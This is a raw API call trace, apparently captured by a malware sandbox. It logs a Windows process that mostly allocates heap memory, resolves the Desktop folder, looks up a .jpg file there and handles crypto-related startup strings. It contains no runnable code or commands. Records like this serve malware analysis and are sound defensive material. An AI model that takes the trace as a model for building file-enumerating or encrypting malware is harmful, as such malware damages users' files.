SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf4d0 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0155.414] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53788 [0155.414] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80060 [0155.414] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0155.414] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0155.415] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0155.415] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53938 [0155.415] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e58910 [0155.415] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80060 | out: hHeap=0x970000) returned 1 [0155.415] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53938 | out: hHeap=0x970000) returned 1 [0155.415] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0155.415] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0155.415] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53938 [0155.415] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53938 | out: hHeap=0x970000) returned 1 [0155.415] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0155.415] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0155.415] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0155.415] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54cb8 [0155.415] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53890 [0155.415] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b28 [0155.415] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf4d0 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0155.415] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53728 [0155.415] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fb90 [0155.415] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b68 [0155.415] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b38 [0155.415] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b68 [0155.415] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53830 [0155.415] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x80) returned 0x2e563a8 [0155.415] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fb90 | out: hHeap=0x970000) returned 1 [0155.415] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53830 | out: hHeap=0x970000) returned 1 [0155.415] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53830 [0155.415] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53830 | out: hHeap=0x970000) returned 1 [0155.415] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b68 | out: hHeap=0x970000) returned 1 [0155.415] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b38 | out: hHeap=0x970000) returned 1 [0155.415] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b28 | out: hHeap=0x970000) returned 1 [0155.416] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c08 [0155.416] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538f0 [0155.416] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0155.416] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53830 [0155.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0155.416] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54b88 [0155.416] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53878 [0155.416] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0155.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0155.416] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e53848 [0155.416] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0155.416] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538c0 [0155.416] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c98 [0155.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e538c0 | out: hHeap=0x970000) returned 1 [0155.416] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79338 [0155.416] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538c0 [0155.416] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e538d8 [0155.416] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54120 [0155.416] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53908 [0155.416] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0155.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53908 | out: hHeap=0x970000) returned 1 [0155.416] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e801e8 [0155.416] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53908 [0155.416] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53920 [0155.416] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54300 [0155.416] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53938 [0155.416] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54be8 [0155.416] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53938 | out: hHeap=0x970000) returned 1 [0155.417] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544b8 [0155.417] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53938 [0155.417] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a40 [0155.417] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54508 [0155.417] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ae8 [0155.417] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0155.417] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b60 [0155.417] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0155.417] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0155.417] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a58 [0155.417] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ca8 [0155.417] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ad0 [0155.417] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53bc0 [0155.417] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c28 [0155.417] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541e8 [0155.417] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53b18 [0155.417] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bf8 [0155.417] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53bf0 [0155.417] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c20 [0155.417] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a58 | out: hHeap=0x970000) returned 1 [0155.417] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542b0 [0155.417] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53ad0 | out: hHeap=0x970000) returned 1 [0155.417] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a58 [0155.417] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53ad0 [0155.417] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0155.417] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544e0 [0155.417] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c38 [0155.417] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cd8 [0155.417] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53c38 | out: hHeap=0x970000) returned 1 [0155.417] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543c8 [0155.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53c38 [0155.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50530 [0155.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542b0 | out: hHeap=0x970000) returned 1 [0155.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0155.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a58 | out: hHeap=0x970000) returned 1 [0155.418] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0155.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a58 [0155.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0155.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0155.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0155.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0155.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54530 [0155.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0155.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ba8 [0155.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50440 [0155.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0155.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0155.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0155.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0155.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0155.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0155.418] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0155.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0155.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0155.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0155.418] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54288 [0155.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504a0 [0155.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0155.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0155.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0155.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0155.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0155.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0155.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0155.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0155.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0155.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a58 | out: hHeap=0x970000) returned 1 [0155.419] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0155.419] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0155.419] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a58 [0155.420] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0155.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a58 | out: hHeap=0x970000) returned 1 [0155.420] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54210 [0155.420] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a58 [0155.420] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e503f8 [0155.420] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b28 [0155.420] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54238 [0155.420] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0155.420] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0155.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0155.420] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54558 [0155.420] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0155.420] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504b8 [0155.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54210 | out: hHeap=0x970000) returned 1 [0155.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0155.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a58 | out: hHeap=0x970000) returned 1 [0155.420] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0155.420] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a58 [0155.420] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0155.420] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a58 | out: hHeap=0x970000) returned 1 [0155.420] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54350 [0155.420] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a58 [0155.420] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0155.421] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0155.421] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54080 [0155.421] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0155.421] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b38 [0155.421] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0155.421] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54378 [0155.421] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50698 [0155.421] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0155.421] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0155.421] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a58 | out: hHeap=0x970000) returned 1 [0155.421] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e53a58 [0155.421] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0155.421] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0155.421] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0155.421] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0155.421] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/HCYfZCy ufaMx.jpg", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf2cb6eb0, ftCreationTime.dwHighDateTime=0x1d5e786, ftLastAccessTime.dwLowDateTime=0x312da960, ftLastAccessTime.dwHighDateTime=0x1d5e2e2, ftLastWriteTime.dwLowDateTime=0x312da960, ftLastWriteTime.dwHighDateTime=0x1d5e2e2, nFileSizeHigh=0x0, nFileSizeLow=0xa57e, dwReserved0=0x0, dwReserved1=0x8cf1b8, cFileName="HCYfZCy ufaMx.jpg", cAlternateFileName="HCYFZC~1.JPG")) returned 0xa87050 [0155.421] FindClose (in: hFindFile=0xa87050 | out: hFindFile=0xa87050) returned 1 [0155.421] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0155.422] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505a8 | out: hHeap=0x970000) returned 1 [0155.422] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e53a58 | out: hHeap=0x970000) returned 1 [0155.422] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0155.422] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0155.422] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0155.422] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50590 | out: hHeap=0x970000) returned 1 [0155.422] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54350 | out: hHeap=0x970000) returned 1 [0155.422] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0155.422] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0155.422] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0155.422] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0155.422] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505f0 [0155.422] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0155.422] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d08 [0155.422] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540a8 [0155.559] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0155.559] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0155.559] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0155.559] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0155.559] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0155.559] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505f0 | out: hHeap=0x970000) returned 1 [0155.559] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0155.559] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0155.559] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0155.559] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0155.559] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0155.559] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0155.559] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0155.559] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54468 [0155.559] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0155.559] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0155.559] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54468 | out: hHeap=0x970000) returned 1 [0155.559] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0155.559] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e505f0 [0155.559] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0155.559] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0155.560] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c68 [0155.560] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fe30 [0155.560] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0155.560] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0155.560] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fe30 | out: hHeap=0x970000) returned 1 [0155.560] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0155.560] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e504d0 [0155.560] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0155.560] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0155.560] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0155.560] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d08 [0155.560] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d08 | out: hHeap=0x970000) returned 1 [0155.560] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0155.560] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0155.560] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0155.560] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0155.560] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69bc8 [0155.560] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69bc8 | out: hHeap=0x970000) returned 1 [0155.560] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0155.560] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0155.560] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77b08 [0155.560] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0155.560] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0155.560] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0155.560] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0155.560] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542b0 [0155.560] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0155.560] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0155.560] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0155.560] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543f0 [0155.560] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0155.561] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d08 [0155.561] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504d0 | out: hHeap=0x970000) returned 1 [0155.561] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54260 [0155.561] 